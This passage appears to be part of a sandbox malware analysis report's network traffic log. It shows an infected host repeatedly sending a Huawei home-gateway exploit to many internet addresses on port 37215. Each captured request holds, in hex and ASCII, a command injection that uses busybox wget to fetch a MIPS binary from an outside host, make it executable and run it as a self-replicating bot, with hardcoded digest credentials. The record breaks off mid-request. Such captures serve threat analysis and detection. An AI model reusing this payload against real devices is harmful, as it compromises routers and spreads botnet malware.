2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          542192.168.2.1548064111.3.184.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.628139019 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          543192.168.2.153599494.159.232.18837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.628356934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          544192.168.2.1559458197.30.238.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.628632069 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          545192.168.2.153347441.142.229.6237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.632098913 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          546192.168.2.1534642101.99.227.15737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.564870119 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          547192.168.2.153418441.197.68.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.564884901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          548192.168.2.1557990162.109.81.23437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.564899921 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          549192.168.2.156017641.147.187.21937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.564922094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          550192.168.2.1548160157.67.130.23637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.564941883 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          551192.168.2.1533934157.161.213.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.564965963 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          552192.168.2.1546754197.79.62.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:50.564987898 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
